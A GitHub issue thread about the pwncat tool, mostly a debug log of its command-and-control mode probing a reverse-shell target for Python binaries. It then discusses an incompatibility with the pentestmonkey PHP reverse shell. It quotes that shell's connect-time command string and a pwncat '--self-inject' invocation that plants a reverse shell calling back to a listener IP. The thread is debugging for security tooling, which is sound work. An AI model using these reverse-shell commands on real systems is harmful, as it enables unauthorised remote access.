2020-06-12 17:05:34,260 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,260 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2.7
2020-06-12 17:05:34,260 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,261 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python2.7 && echo /opt/python3.5/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,261 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,284 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,284 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3
2020-06-12 17:05:34,284 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,284 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3 && echo /opt/python3.5/bin/python3 || echo;\n'
2020-06-12 17:05:34,284 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,311 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,311 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.5
2020-06-12 17:05:34,311 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,311 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.5 && echo /opt/python3.5/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,311 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,345 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,345 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.6
2020-06-12 17:05:34,346 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,346 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.6 && echo /opt/python3.5/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,346 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,371 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,371 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.7
2020-06-12 17:05:34,371 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,371 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.7 && echo /opt/python3.5/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,371 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,396 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,396 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.8
2020-06-12 17:05:34,396 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,396 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.8 && echo /opt/python3.5/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,396 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,422 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,422 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python
2020-06-12 17:05:34,422 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,422 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python && echo /opt/python3.6/bin/python || echo;\n'
2020-06-12 17:05:34,422 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,446 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,446 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2
2020-06-12 17:05:34,446 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,446 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python2 && echo /opt/python3.6/bin/python2 || echo;\n'
2020-06-12 17:05:34,446 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,469 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,470 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2.7
2020-06-12 17:05:34,470 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,470 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python2.7 && echo /opt/python3.6/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,470 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,495 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,496 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3
2020-06-12 17:05:34,496 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,496 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3 && echo /opt/python3.6/bin/python3 || echo;\n'
2020-06-12 17:05:34,497 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,522 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,522 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.5
2020-06-12 17:05:34,522 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,522 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.5 && echo /opt/python3.6/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,522 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,550 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,550 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.6
2020-06-12 17:05:34,551 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,551 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.6 && echo /opt/python3.6/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,551 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,593 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,593 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.7
2020-06-12 17:05:34,593 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,593 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.7 && echo /opt/python3.6/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,593 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,616 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,616 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.8
2020-06-12 17:05:34,616 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,616 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.8 && echo /opt/python3.6/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,616 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,649 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,649 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python
2020-06-12 17:05:34,649 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,649 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python && echo /opt/python3.7/bin/python || echo;\n'
2020-06-12 17:05:34,650 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,680 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,680 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2
2020-06-12 17:05:34,680 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,680 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python2 && echo /opt/python3.7/bin/python2 || echo;\n'
2020-06-12 17:05:34,680 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,707 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,707 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2.7
2020-06-12 17:05:34,707 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,708 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python2.7 && echo /opt/python3.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,708 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,733 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,733 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3
2020-06-12 17:05:34,733 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,733 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3 && echo /opt/python3.7/bin/python3 || echo;\n'
2020-06-12 17:05:34,733 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,774 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,774 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.5
2020-06-12 17:05:34,774 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,774 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.5 && echo /opt/python3.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,774 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,800 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,800 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.6
2020-06-12 17:05:34,800 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,800 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.6 && echo /opt/python3.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,800 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,827 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,827 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.7
2020-06-12 17:05:34,828 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,828 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.7 && echo /opt/python3.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,828 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,851 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,851 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.8
2020-06-12 17:05:34,851 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,851 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.8 && echo /opt/python3.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,852 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,876 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,876 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python
2020-06-12 17:05:34,876 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,876 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python && echo /opt/python3.8/bin/python || echo;\n'
2020-06-12 17:05:34,876 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,902 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,902 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2
2020-06-12 17:05:34,902 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,902 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python2 && echo /opt/python3.8/bin/python2 || echo;\n'
2020-06-12 17:05:34,902 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,927 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,928 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2.7
2020-06-12 17:05:34,928 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,928 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python2.7 && echo /opt/python3.8/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,928 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,954 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,954 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3
2020-06-12 17:05:34,954 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,954 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3 && echo /opt/python3.8/bin/python3 || echo;\n'
2020-06-12 17:05:34,954 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,986 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,986 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.5
2020-06-12 17:05:34,986 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,986 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.5 && echo /opt/python3.8/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,986 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,010 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,010 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.6
2020-06-12 17:05:35,010 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:35,010 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.6 && echo /opt/python3.8/bin/python3.6 || echo;\n'
2020-06-12 17:05:35,010 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,033 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,033 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.7
2020-06-12 17:05:35,033 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:35,033 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.7 && echo /opt/python3.8/bin/python3.7 || echo;\n'
2020-06-12 17:05:35,034 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,106 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,106 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.8
2020-06-12 17:05:35,106 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:35,106 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo;\n'
2020-06-12 17:05:35,106 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,130 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,130 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] No Python has been found. Aborting and handing over to current shell.
2020-06-12 17:05:35,130 TRACE [RECV] 3476:run_action(): [RECV] Producer Start
2020-06-12 17:05:35,130 TRACE [STDIN] 3476:run_action(): [STDIN] Producer Start
2020-06-12 17:05:35,155 DEBUG [RECV] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,155 TRACE [RECV] 1944:receive(): Received: '\n$ '
2020-06-12 17:05:35,155 TRACE [RECV] 3478:run_action(): [RECV] Producer received: '\n$ '
$ 2020-06-12 17:05:35,220 DEBUG [RECV] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,220 TRACE [RECV] 1944:receive(): Received: '\n$ '
2020-06-12 17:05:35,220 TRACE [RECV] 3478:run_action(): [RECV] Producer received: '\n$ '
same thing |
Also tried it on my internal system and i get the same results. |
How did you start the reverse shell on the remote side? |
PHP reverse shell. Pen test monkeys one |
Can you try to use pwncat, nc or ncat directly as a reverse shell (also locally is fine) and see if that works. If it does can you send me the exact PHP reverse shell from Pen test monkey |
Found the issue: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php#L54 It is doing this upon connect: <?php
$shell = 'uname -a; w; id; /bin/sh -i'; So it's sending output of the following commands upon connect (which
I can now reproduce this and will try to find a generic solution to such kind of reverse shells |
Okay I'm glad you have found the cause of the issue. Unfortunately PHP reverse shell is quite a common haha |
@dalemazza that should now be fixed in the latest commit of branch |
Amazing work! |
just testing it now and it is hanging on probing the python |
`kali@kali:~$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234 -vvv ` |
just to confirm it is working using just |
Thanks for the update. Currently working on getting multiple different remote shells to work and also preparing regression tests for CI for that. I will ping you once I got it working for all edge cases. |
@dalemazza I made quite a lot of changes now. You can try and pull the latest commit from the release branch and see if that works out for you. |
The branch where this is being fixed is |
It works! great work man. Such a great tool, the self inject bit is genius! |
Glad to hear. Let's leave this ticket open until the branch is merged. |
@dalemazza It's now release and available via |
Do you have any idea why it does not pick up any python versions installed when it clearly has python installed on the box?
Originally posted by @dalemazza in #81 (comment)
The text was updated successfully, but these errors were encountered: